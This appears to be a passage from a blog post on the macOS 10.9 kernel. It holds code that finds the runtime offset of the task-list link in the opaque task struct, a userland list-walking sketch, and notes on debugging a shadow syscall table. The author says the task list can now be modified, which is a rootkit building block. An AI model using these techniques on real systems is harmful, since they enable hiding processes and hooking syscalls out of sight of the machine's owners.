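// Hand-written model of the RELEASE listing, instructions No. 1 to 15.
std::vector<Insn> release_listing()
{
    const Reg N = Reg::None;
    return {
        {Op::Call, Sym::LckMtxLock, N, N, 0},                 // 1
        {Op::Lea,  Sym::Tasks,      N, N, 0},                 // 2
        {Op::Mov,  Sym::None,       N, N, 0},                 // 3 (a load)
        {Op::Cmp,  Sym::None,       N, N, 0},                 // 4
        {Op::Je,   Sym::None,       N, N, 0},                 // 5
        {Op::Mov,  Sym::None, Reg::Rcx, Reg::Rbx, 0x28},      // 6
        {Op::Jmp,  Sym::None,       N, N, 0},                 // 7
        {Op::Mov,  Sym::None, Reg::Rax, Reg::Rbx, 0x0},       // 8
        {Op::Mov,  Sym::None, Reg::Rbx, Reg::Rcx, 0x30},      // 9
        {Op::Mov,  Sym::None, Reg::Rbx, Reg::Rax, 0x28},      // 10
        {Op::Mov,  Sym::None, Reg::Rax, Reg::Rbx, 0x8},       // 11
        {Op::Lea,  Sym::Other,      N, N, 0},                 // 12
        {Op::Inc,  Sym::None,       N, N, 0},                 // 13
        {Op::Lea,  Sym::Other,      N, N, 0},                 // 14
        {Op::Call, Sym::Other,      N, N, 0},                 // 15
    };
}
```

On the unmodified listing the first path already hits at No. 6. If you knock that instruction out of the model, the second path still finds the same displacement at No. 10.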

The described method works for all officially released 10.9 RELEASE mach_kernels. The DEBUG version is a bit different. Here is the code for the described method:

Task.cpp (Repository)
bool Task::decompose_tasks_offset_callback(_DInst *decodedInstructions, unsigned int i, unsigned int maxIndex)
{
    bool shouldStop = false;
    
    if(decodedInstructions[i].opcode == I_CALL &&
       INSTRUCTION_GET_TARGET( &decodedInstructions[i]) == (mach_vm_address_t)lck_mtx_lock &&
       i + 1 < maxIndex &&
       decodedInstructions[i + 1].opcode == I_LEA &&
       decodedInstructions[i + 1].ops[0].type == O_REG
      )
    {                
        if(INSTRUCTION_GET_TARGET(&decodedInstructions[i + 1]) != (mach_vm_address_t)tasks) 
        {
            shouldStop = true;
            return shouldStop;
        }
        
        // Search for the JMP and get the offset from its previous instruction
        for(unsigned int j = 2; j < 12 && i + j < maxIndex; j++)
        {

            if(decodedInstructions[i + j].opcode == I_JMP)
            {            
                unsigned int indexOfJMP = i + j;

                if(decodedInstructions[indexOfJMP - 1].opcode == I_MOV &&
                   decodedInstructions[indexOfJMP - 1].ops[0].index == R_RCX &&
                   decodedInstructions[indexOfJMP - 1].ops[0].type == O_SMEM &&
                   decodedInstructions[indexOfJMP - 1].ops[1].type == O_REG &&
                   decodedInstructions[indexOfJMP - 1].ops[1].index == R_RBX
                   )
                {
                    tasks_offset = (uint32_t)decodedInstructions[indexOfJMP - 1].disp;                                        
                    shouldStop = true;
                    break;
                }

                // Try to find offset after the JMP
                for(unsigned int k = j + 1; k < j + 5 && i + k < maxIndex; k++)
                {
                    if(decodedInstructions[i + k].opcode == I_MOV &&
                       decodedInstructions[i + k].ops[0].type == O_SMEM &&
                       decodedInstructions[i + k].ops[0].index == R_RBX &&
                       decodedInstructions[i + k].ops[1].type == O_REG &&
                       decodedInstructions[i + k].ops[1].index == R_RAX)
                    {
                                               
                        tasks_offset = (uint32_t)decodedInstructions[i + k].disp;
                        shouldStop = true;
                        break;
                    }
                }
                shouldStop = true;
                break;
                
            }
        }
    }
    
    
    return shouldStop;    
}

That’s it. We now have a reliable way of accessing the tasks list and the tasks field in the underlying struct of a task_t. Modifying the list is now also possible.
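As a rough idea of what the offset buys us, here is a small userland sketch that walks such a list using only a head pointer and an offset discovered at runtime. It is a model, not kernel code: fake_task, fake_enqueue, next_task and count_tasks are names I invented, and fake_task merely stands in for the opaque struct task. The links point at the element itself (or at the head), just like in the disassembly above, where rbx (the new task) is stored directly into the list. In the kernel you would of course have to hold tasks_threads_lock while doing this.

```cpp
#include <cstddef>
#include <cstdint>

// Same shape as a queue head / queue chain: a circular doubly linked list.
struct queue_entry {
    queue_entry *next;
    queue_entry *prev;
};

// Stand-in for the opaque kernel struct, only used to build test data.
struct fake_task {
    char        padding[0x28];  // whatever precedes the field
    queue_entry tasks;
};

// Mirrors what the disassembled enqueue does: links store element pointers.
void fake_enqueue(queue_entry *head, fake_task *t)
{
    queue_entry *prev = head->prev;
    queue_entry *elt  = reinterpret_cast<queue_entry *>(t);
    if (prev == head)
        head->next = elt;                                     // list was empty
    else
        reinterpret_cast<fake_task *>(prev)->tasks.next = elt;
    t->tasks.prev = prev;
    t->tasks.next = head;
    head->prev    = elt;
}

// Follow the link stored inside an element at the runtime-discovered offset.
queue_entry *next_task(void *task, uint32_t tasks_offset)
{
    char *chain = static_cast<char *>(task) + tasks_offset;
    return reinterpret_cast<queue_entry *>(chain)->next;
}

// Count the elements without knowing anything else about their layout.
std::size_t count_tasks(queue_entry *head, uint32_t tasks_offset)
{
    std::size_t n = 0;
    for (queue_entry *e = head->next; e != head; e = next_task(e, tasks_offset))
        n++;
    return n;
}
```

The point of the design is that nothing here depends on a compiled-in struct task layout. Only the single number tasks_offset changes between kernel versions.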

Waiting for Task_t Implementation…

-

Sorry guys, the second article about the task_t list is not released yet. I had some trouble with the Shadow Syscall Table I implemented in Heroine. If you want to know what a Shadow Syscall Table is, you can read an interesting article about it here.

I have been hunting bugs for the last 3 days, but I still have not found out why a kernel panic() happens when the Shadow Table is undone.

The panic() is triggered from unix_syscall64(), and I think it is due to a race condition. I assume this because there is no panic() when I defer _FREE()’ing the Shadow Table’s memory long enough.

So the implementation for accessing the task_t list had to wait. I hope I can get back to it soon.